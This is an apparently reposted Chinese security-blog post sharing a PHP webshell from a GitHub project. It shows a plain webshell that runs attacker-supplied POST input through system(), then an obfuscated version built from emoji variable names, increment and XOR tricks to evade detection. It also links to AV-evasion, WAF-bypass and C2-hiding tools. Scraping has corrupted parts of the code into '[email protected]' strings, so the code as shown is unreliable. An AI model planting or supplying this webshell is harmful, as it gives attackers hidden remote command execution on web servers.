分享 | 利用表情符号做的PHP版webshell(附下载)
项目地址:https://github.com/nightfury99/php-emoji-webshell0x01 php-emoji-webshell介绍这个 webshell 没有什么新东西,只 2022-9-26 20:0:7 Author: EchoSec(查看原文) 阅读量:40 收藏
项目地址:https://github.com/nightfury99/php-emoji-webshell0x01 php-emoji-webshell介绍这个 webshell 没有什么新东西,只 2022-9-26 20:0:7 Author: EchoSec(查看原文) 阅读量:40 收藏
项目地址:
https://github.com/nightfury99/php-emoji-webshell
0x01 php-emoji-webshell介绍
这个 webshell 没有什么新东西,只是使用相同的技术,如 XOR 和自增操作。
0x02 原webshell代码
<?php$a = $_POST[4] ? base64_decode($_POST[4]) : 'whoami';@system($a);
0x03 变成表情符号、自增或异或运算
<?php$_=[];[email protected]"$_";$__=("_"=="_")+("_"=="_");[email protected]$_[++$__];$🌏=$_++;$🤮=$_++;$🍪=$_++;$🫣=$_++;$🧁=$_++;$🎂=$_++;$🥃=$_++;$🍔=$_++;$🌘=$_++;$🌗=$_++;$🌖=$_++;$🌕=$_++;$🌒=$_++;$🌓=$_++;$🌔=$_++;$🌰=$_++;$🍘=$_++;$🥗=$_++;$🥥=$_++;$🍑=$_++;$🍋=$_++;$🧇=$_++;$🌮=$_++;$🍕=$_++;$🥯=$_++;$🍣=$_;$__++;$__++;$__++;$👿=$🤮.$🌏.$🥥.$🧁.$__;$__--;$__--;$👿.=$__.("#"^"|").$🫣.$🧁.$🍪.$🌔.$🫣.$🧁;$💀=$🥥.$🥯.$🥥.$🍑.$🧁.$🌒;$🥳=("#"^"|").($🥥^"#").($🌕^"#").($🌰^"#").($🌮^"#");$🤯[email protected]${$🥳}[$__] ? $👿(@${$🥳}[$__]) : $🌮.$🍔.$🌔.$🌏.$🌒.$🌘;@$💀($🤯);
>精彩回顾<
Cobalt Strike免杀脚本生成器|cna脚本|bypassAV
xss bypass备忘单|xss绕过防火墙技巧|xss绕过WAF的方法
【贼详细 | 附PoC工具】Apache HTTPd最新RCE漏洞复现
【神兵利器 | 附下载】一个用于隐藏C2的、开箱即用的Tools
关注我
获得更多精彩
坚持学习与分享!走过路过点个"在看",不会错过
仅用于学习交流,不得用于非法用途
如侵权请私聊公众号删文
文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247485849&idx=1&sn=702443b4228aff2d45ad9ae0c4434066&chksm=fcdf5586cba8dc9078fed3c60153d6faa0e7c36e65b7a5a1c2c5b717d48df6528cb3f2837fa3#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh